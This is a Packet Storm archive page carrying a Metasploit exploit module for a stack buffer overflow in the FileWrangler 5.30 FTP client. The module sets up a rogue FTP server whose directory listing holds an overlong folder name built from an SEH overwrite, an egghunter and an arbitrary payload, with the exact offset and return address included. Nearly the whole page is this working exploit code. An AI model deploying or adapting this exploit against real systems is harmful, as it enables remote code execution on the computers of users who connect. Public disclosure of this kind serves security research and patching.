what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FileWrangler 5.30 Stack Buffer Overflow

FileWrangler 5.30 Stack Buffer Overflow
Posted Oct 13, 2010
Authored by corelanc0d3r, nullthreat | Site metasploit.com

This Metasploit module exploits a buffer overflow in the FileWrangler client that is triggered when the client connects to a FTP server and lists the directory contents, containing an overly long directory name.

tags | exploit, overflow
SHA-256 | 95851d121dac72f5b67123647939012f5eb8f8288e71b4bf2e3aba8b78359ec8

FileWrangler 5.30 Stack Buffer Overflow

Change Mirror Download
##
# $Id: filewrangler_list_reply.rb 10660 2010-10-12 18:39:21Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'FileWrangler 5.30 Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the FileWrangler client
that is triggered when the client connects to a FTP server and lists
the directory contents, containing an overly long directory name.
},
'Author' =>
[
'nullthreat', # found bug
'corelanc0d3r' # wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision: 10660 $",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 3000,
'BadChars' => "\x00\x0d\x1a\x2a\x51",
'StackAdjustment' => -5000,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Offset' => 4082, 'Ret' => 0x0042BE63 } ], #ppr [wrangler.exe]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))

end


def setup
super
end

def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end

def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")

# create the egg hunter
print_status(" - Creating the Egg Hunter")
badchars = ""
eggoptions =
{
:checksum => true,
:eggtag => "W00T"
}

hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)

# create hunter
predator = "\x90" * 42
predator << hunter

# create the crash payload
crash = rand_text_alpha(target['Offset'] - (egg.length + predator.length))

# Set nseh to jump back 50 (before egghunter)
jmp = "\x90" * 5 + "\xE9\xC9\xFF\xFF\xFF"
nseh = "\xEB\xF9\x90\x90" # NSEH
seh = [target.ret].pack('V')

print_status(" - Building the Buffer")
buffer = crash + egg + predator + jmp + nseh + seh
strfolder = buffer + "B" * (5000-buffer.length) #make sure it dies

print_status(" - Sending directory list via data connection")
dirlist ="drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{strfolder}\r\n"
conn.put(dirlist)
conn.close
print_status(" - Waiting for egghunter...")
return

end

end
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close